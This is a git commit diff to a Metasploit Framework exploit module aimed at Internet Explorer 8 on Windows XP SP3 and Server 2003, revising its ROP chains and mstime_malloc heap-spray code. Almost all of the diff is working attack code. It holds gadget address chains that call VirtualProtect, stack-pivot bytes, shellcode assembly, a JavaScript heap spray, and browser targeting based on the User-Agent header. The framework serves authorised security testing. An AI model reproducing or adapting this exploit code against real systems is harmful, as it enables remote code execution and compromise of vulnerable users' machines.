Updates ROP chain and mstime_malloc usage
sinn3r
parent
c7609ac7d1
commit
075f6e8d45
|
|
@ -1,5 +1,4 @@
|
|||
##
|
||||
#
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
|
|
@ -83,7 +82,6 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
def get_target(agent)
|
||||
#If the user is already specified by the user, we'll just use that
|
||||
return target if target.name != 'Automatic'
|
||||
|
||||
nt = agent.scan(/Windows NT (\d\.\d)/).flatten[0] || ''
|
||||
|
|
@ -115,25 +113,16 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
return nil
|
||||
end
|
||||
|
||||
def junk(n=4)
|
||||
rand_text_alpha(n).unpack("V")[0].to_i
|
||||
end
|
||||
|
||||
def nop
|
||||
make_nops(4).unpack("V")[0].to_i
|
||||
end
|
||||
|
||||
def get_payload(t, cli)
|
||||
code = payload.encoded
|
||||
|
||||
# No rop. Just return the payload.
|
||||
return code if t['Rop'].nil?
|
||||
rop_payload = ''
|
||||
|
||||
case t['Rop']
|
||||
when :msvcrt
|
||||
case t.name
|
||||
when 'IE 8 on Windows XP SP3'
|
||||
rop_gadgets =
|
||||
algin = "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500
|
||||
chain = ''
|
||||
|
||||
if t.name == 'IE 8 on Windows XP SP3'
|
||||
chain =
|
||||
[
|
||||
0x77c1e844, # POP EBP # RETN [msvcrt.dll]
|
||||
0x77c1e844, # skip 4 bytes [msvcrt.dll]
|
||||
|
|
@ -158,8 +147,12 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
0x77c12df9, # PUSHAD # RETN [msvcrt.dll]
|
||||
0x77c35459 # ptr to 'push esp # ret ' [msvcrt.dll]
|
||||
].pack("V*")
|
||||
when 'IE 8 on Windows Server 2003'
|
||||
rop_gadgets =
|
||||
|
||||
elsif t.name == 'IE 8 on Windows Server 2003'
|
||||
junk = rand_text_alpha(4).unpack("V")[0].to_i
|
||||
nop = make_nops(4).unpack("V")[0].to_i
|
||||
|
||||
chain =
|
||||
[
|
||||
0x77bb2563, # POP EAX # RETN
|
||||
0x77ba1114, # <- *&VirtualProtect()
|
||||
|
|
@ -187,40 +180,16 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
0x77be6591 # PUSHAD # ADD AL,0EF # RETN
|
||||
].pack("V*")
|
||||
end
|
||||
else
|
||||
rop_gadgets =
|
||||
[
|
||||
0x7c37653d, # POP EAX # POP EDI # POP ESI # POP EBX # POP EBP # RETN
|
||||
0xfffffdff, # Value to negate, will become 0x00000201 (dwSize)
|
||||
0x7c347f98, # RETN (ROP NOP) [msvcr71.dll]
|
||||
0x7c3415a2, # JMP [EAX] [msvcr71.dll]
|
||||
0xffffffff,
|
||||
0x7c376402, # skip 4 bytes [msvcr71.dll]
|
||||
0x7c351e05, # NEG EAX # RETN [msvcr71.dll]
|
||||
0x7c345255, # INC EBX # FPATAN # RETN [msvcr71.dll]
|
||||
0x7c352174, # ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN [msvcr71.dll]
|
||||
0x7c344f87, # POP EDX # RETN [msvcr71.dll]
|
||||
0xffffffc0, # Value to negate, will become 0x00000040
|
||||
0x7c351eb1, # NEG EDX # RETN [msvcr71.dll]
|
||||
0x7c34d201, # POP ECX # RETN [msvcr71.dll]
|
||||
0x7c38b001, # &Writable location [msvcr71.dll]
|
||||
0x7c347f97, # POP EAX # RETN [msvcr71.dll]
|
||||
0x7c37a151, # ptr to &VirtualProtect() - 0x0EF [IAT msvcr71.dll]
|
||||
0x7c378c81, # PUSHAD # ADD AL,0EF # RETN [msvcr71.dll]
|
||||
0x7c345c30 # ptr to 'push esp # ret ' [msvcr71.dll]
|
||||
# rop chain generated with mona.py
|
||||
].pack("V*")
|
||||
end
|
||||
|
||||
rop_payload = rop_gadgets
|
||||
case t['Rop']
|
||||
when :msvcrt
|
||||
rop_payload << "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500
|
||||
rop_payload = chain + algin + payload.encoded
|
||||
|
||||
else
|
||||
rop_payload << "\x81\xEC\xF0\xD8\xFF\xFF" # sub esp, -10000
|
||||
code = "\x81\xEC\xF0\xD8\xFF\xFF" # sub esp, -10000
|
||||
code << payload.encoded
|
||||
code << rand_text_alpha(12000)
|
||||
|
||||
rop_payload = generate_rop_payload('java', code)
|
||||
end
|
||||
rop_payload << code
|
||||
rop_payload << rand_text_alpha(12000) unless t['Rop'] == :msvcrt
|
||||
|
||||
return rop_payload
|
||||
end
|
||||
|
|
@ -278,28 +247,22 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
CollectGarbage();
|
||||
|
||||
hd = unescape("ABCD");
|
||||
sparkle = unescape("ABCD");
|
||||
for (i=0; i < 2; i++) {
|
||||
unicorn += unescape("ABCD");
|
||||
sparkle += unescape("ABCD");
|
||||
}
|
||||
unicorn += unescape("AB");
|
||||
sparkle += unescape("AB");
|
||||
sparkle += unescape("#{js_payload}");
|
||||
|
||||
unicorn += unescape("#{js_payload}");
|
||||
|
||||
animvalues = unescape("#{align_esp}");
|
||||
magenta = unescape("#{align_esp}");
|
||||
|
||||
for (i=0; i < 0x70/4; i++) {
|
||||
if (i == 0x70/4-1) {
|
||||
animvalues += unescape("#{xchg_esp}");
|
||||
}
|
||||
else {
|
||||
animvalues += unescape("#{align_esp}");
|
||||
}
|
||||
if (i == 0x70/4-1) { magenta += unescape("#{xchg_esp}"); }
|
||||
else { magenta += unescape("#{align_esp}"); }
|
||||
}
|
||||
|
||||
animvalues += unicorn;
|
||||
|
||||
mstime_malloc({shellcode:animvalues, heapBlockSize:0x38, objId:"myanim"});
|
||||
magenta += sparkle;
|
||||
mstime_malloc({shellcode:magenta, heapBlockSize:0x38, objId:"myanim"});
|
||||
}
|
||||
|
||||
</script>
|
||||
|
|
@ -315,12 +278,12 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
def on_request_uri(cli, request)
|
||||
print_warning("test!!!!!!!!!!!!!")
|
||||
agent = request.headers['User-Agent']
|
||||
uri = request.uri
|
||||
print_status("Requesting: #{uri}")
|
||||
|
||||
my_target = get_target(agent)
|
||||
# Avoid the attack if no suitable target found
|
||||
if my_target.nil?
|
||||
print_error("Browser not supported, sending 404: #{agent}")
|
||||
send_not_found(cli)
|
||||
|
|
@ -334,4 +297,3 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
end
|
||||
|
||||
|
|
|
|||
Loading…
Reference in New Issue